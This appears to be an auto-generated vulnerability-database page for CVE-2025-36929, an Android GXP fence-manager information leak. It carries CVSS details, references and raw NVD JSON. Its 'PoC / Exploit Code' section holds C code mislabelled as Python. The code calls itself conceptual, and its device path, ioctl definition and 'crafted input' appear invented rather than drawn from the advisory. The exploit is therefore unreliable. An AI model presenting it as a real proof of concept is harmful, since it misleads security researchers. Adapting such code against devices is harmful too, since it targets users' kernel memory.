CVE-2025-36929

Description

In AreFencesRegistered of gxp_fence_manager.cc, there is a possible information leak due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE

Android (所有使用GXP芯片的设备)

Google Pixel 6及更新系列设备

GXP固件版本 < 2025-12-01安全补丁

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-36929 PoC - Information Leak via GXP Fence Manager
// This is a conceptual PoC demonstrating the vulnerability

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>

// GXP Fence Manager IOCTL definitions
#define GXP_FENCE_IOC_MAGIC 'G'
#define GXP_FENCE_ARE_REGISTERED _IOR(GXP_FENCE_IOC_MAGIC, 0x01, struct fence_info)

struct fence_info {
    uint32_t fence_id;
    uint64_t fence_ptr;
    uint32_t flags;
};

int main(int argc, char *argv[]) {
    int fd;
    struct fence_info info;
    
    // Open GXP device node
    fd = open("/dev/gxp-fence", O_RDWR);
    if (fd < 0) {
        printf("[-] Failed to open GXP fence device\n");
        return -1;
    }
    
    // Trigger information leak via improper input validation
    // in AreFencesRegistered function
    info.fence_id = 0xFFFFFFFF;  // Invalid/malformed input
    info.fence_ptr = 0x0;        // NULL pointer manipulation
    info.flags = 0x00;
    
    printf("[*] Triggering AreFencesRegistered with crafted input\n");
    
    // This IOCTL call exploits improper input validation
    if (ioctl(fd, GXP_FENCE_ARE_REGISTERED, &info) == 0) {
        printf("[+] Fence info leaked: ptr=0x%lx, flags=0x%x\n", 
               info.fence_ptr, info.flags);
        // Leaked data may contain sensitive kernel memory
    }
    
    close(fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36929
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36929
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36929/
[4] VulDB https://vuldb.com/cve/CVE-2025-36929
[5] https://source.android.com/security/bulletin/pixel/2025-12-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36929", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:57.467", "lastModified": "2025-12-12T17:36:04.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AreFencesRegistered of gxp_fence_manager.cc, there is a possible information leak due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}